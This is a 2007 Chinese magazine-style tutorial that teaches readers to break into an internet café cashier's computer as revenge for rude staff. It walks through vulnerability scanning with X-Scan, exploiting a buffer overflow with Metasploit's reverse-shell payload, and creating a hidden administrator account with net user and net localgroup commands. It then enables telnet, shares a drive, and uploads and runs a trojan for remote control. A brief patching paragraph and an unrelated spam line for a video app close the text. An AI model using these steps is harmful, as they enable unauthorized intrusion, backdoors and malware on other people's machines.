從“頭到腳” 教你溢出網吧收銀臺
來源:eNet硅谷動力 更新時間:2007-03-19
  網吧收銀員,大多都是從外邊雇傭而來,并非家里人進行收銀,因此在沒有老板看守的情況下,她們對待上機用戶的態度,有時極為惡劣,并且嚴重時還會“面紅耳赤”的反說顧客不是。如果哪天被自己給碰上,面對這一切會不會很生氣?結果當然是肯定的。俗話說:“求誰不如求自己”,殊不知溢出攻擊就可以幫你這個忙。

  小提示:溢出攻擊就像是將很多沙子倒入裝滿水的容器時,水就會溢出來一樣。目前,大多溢出攻擊都是針對緩沖區的溢出。當緩沖區被溢出時,過剩的信息對電腦內存中原有內容進行完全替換,如未進行備份,你的內容就會永遠丟失。而如今溢出程序與以前大不一樣,它不僅具備破壞文件的能力,而且還會為你提供一個非法執行程序的平臺,從而可以對其電腦進行遠程控制。
  一、檢測網吧收銀臺電腦的漏洞

  入侵不能靠蒙,一定要相對你所要入侵的電腦,有一定詳細了解后,才能從中找到里面含有的危險漏洞,從而實施進步入侵。但是尋找電腦里面的詳細信息,如果沒有一個快捷有效的方法,那么你接下來的入侵就會被其所影響。因此筆者這里借助大家“耳熟能詳”的Xscan檢測工具,它是一款采用多線程方式對指定IP地址段(或單機),進行安全漏洞檢測的掃描工具。其支持插件功能,并且提供了圖形界面和命令行兩種操作方式,對于掃描出的漏洞,還給予相應的漏洞描述及解決方案,是你在采取漏洞入侵之前,必備的“踩點”工具。

  軟件名稱:X-Scan V3.3
  軟件版本:V3.2 簡體中文版
  軟件大小:10507 KB
  軟件性質:免費軟件
  應用平臺:Windows 9X/NT/2000/XP
  下載地址:http://www.onlinedown.net/soft/1498.htm

  下載完畢后,首先打開“Xscan_gui”客戶端程序,在默認情況下它已經設置好,大家所要檢測的溢出漏洞選項。如果你還要檢測其他服務漏洞,請依次單擊上方“設置”→“掃描參數”選項,在彈出的“掃描參數”對話框內,輸入網吧收銀臺IP地址,而后選擇“全局設置”標簽里的“掃描模塊”選項,此時編輯區就會出現所有可以檢測的服務漏洞(如圖1)。這里你只要從中勾選上,自己想要掃描的“漏洞服務”復選框,然后在“順路原路”返回到掃描界面,單擊“文件”菜單,選擇“開始掃描”選項,或者直接在“工具”欄,單擊“開始掃描”按鈕,即可對其所要檢測的主機進行安全掃描。稍等片刻后,要想觀看其詳細的掃描結果,請在工具欄處單擊“檢測報告”按鈕,在所顯示的“掃描報告”對話框里,單擊“確定”按鈕,就會立即以HTML網頁形式,將本次掃描結果展現在大家面前。從中你只要發現描述中含有緩沖區溢出漏洞的相關描述(如圖2),就證明我們可以利用下面的方法進行溢出入侵。


圖1



圖2

  二、“打網撈魚”式的溢出入侵

  俗話說:“知己知彼,百戰不殆。”既然從以上我們已經得知,其收銀主機的詳細漏洞情況,那么下面就拿出具有針對該漏洞,十分有效的Metasploit Framework攻擊工具展開溢出(下載地址:http://www.163vc.com/Soft/200611/6693.html)。大家可能都對其很了解,這里就不多加介紹了,打開其“下載到本地”的壓縮包程序,里面會包含很多應用程序和文件目錄,你只要運行名稱為“msfupdate.bat”的批處理程序,在所彈出的“命令”窗口內。將其命令行括號里的“IP地址+端口”的數字,粘貼到IE瀏覽器的地址欄處,并且敲擊“回車鍵”按鈕,就可進入“溢出漏洞”頁面,從中找到掃描漏洞可利用程序(如圖3)。單擊“其名稱”標簽進入,然后選擇最下面溢出系統平臺為微軟所有版本,從里面找到“Win32_reverse”名稱,其含義代表溢出后,會以SHELL平臺進行命令控制。點擊后進入到“準備溢出”頁面,在The target address前方文本處,輸入被溢出的主機IP地址,單擊“Exploit”按鈕開始溢出。稍等片刻后,如果返回的是這段信息提示(如圖4),證明溢出其主機已經成功,單擊“Session 4”(深藍色字符)標簽,進入到以網頁模式所“裝點”的SHELL命令平臺,該平臺也就是被溢出主機的系統命令平臺。


圖3



圖4


  小提示:shell 是一個交互性命令解釋器,通常被人們認為是操作系統的外殼,能夠使用戶在命令行鍵入完命令后,經過其解釋后傳送給操作系統(內核)執行,從而以必要的動作,來執行用戶的輸出。

  如果要想給其主機建立個用戶,請在下方文本處輸入“net user flywcy$(用戶名) 123456(密碼) /add”的格式命令,這樣就可建立自己的用戶名稱了,不過其權限身份為普通用戶,除了可以瀏覽觀看文件,就沒有太大的作為了。所以你還需要繼續在其文本處,輸入net localgroup administrators flywcy$(用戶名) /add的格式命令后,單擊“Run”按鈕,此時就會立即將其普通用戶身份,提升為管理員權限。接下來為了使你的控制程序(木馬),能夠上傳并且運行在被溢出的主機內,這里為它開通Telnet服務,還要繼續在下方文本處,輸入open telnet命令后,單擊“Run”按鈕,才可開放其主機遠程登錄服務。

  操作完畢后,打開系統自帶的“CMD命令”窗口,在其光標閃爍的命令行下,輸入telnet 168.168.168118(所要登錄遠程主機的IP地址),敲擊“回車鍵”按鈕,就會立即連接上遠程被溢出的漏洞主機,然后按照提示信息,輸入剛才在遠程主機建立的用戶名及密碼,登錄即可。而后開通C盤共享服務,在命令行處輸入net share d$(共享名)=d(盤符路徑)字符,敲擊“回車”按鈕,將其共享開放。順“原路”返回到系統桌面,在空白處單擊“右鍵”按鈕,依次選擇“新建”→“快捷方式”選項,在彈出的“創建快捷方式”對話框內,輸入//168.168.168.118/d$(被開放共享主機的IP地址及共享盤符)。然后單擊“下一步”按鈕直到完成結束,就會在桌面出現帶有IP地址名稱的文件夾。然后打開此文件夾,把控制程序(木馬)放置其中,在Telnet里運行即可遠程遙控主機(如圖5)。


圖5

  三、防范溢出入侵

  以上從發現漏洞到入侵,其掃描器不僅給攻擊者一個漏洞利用參考,而且對于其漏洞的修補,也給了明確的補救方案,這里你可以根據掃描器所提供給你的解決方案,進入微軟公司頁面來完成漏洞的修補。當然你也可以依靠百度搜索引擎的功能,來尋找能夠修補其漏洞的安全補丁。此時如果你還想修補系統內的其他漏洞,只要繼續在其百度平臺下,輸入想要修補漏洞的關鍵字,即可從中找到修補其漏洞補丁的鏈接。



铁牛视频app下载苹果-铁牛视频app下载地址-铁牛视频app破解版ios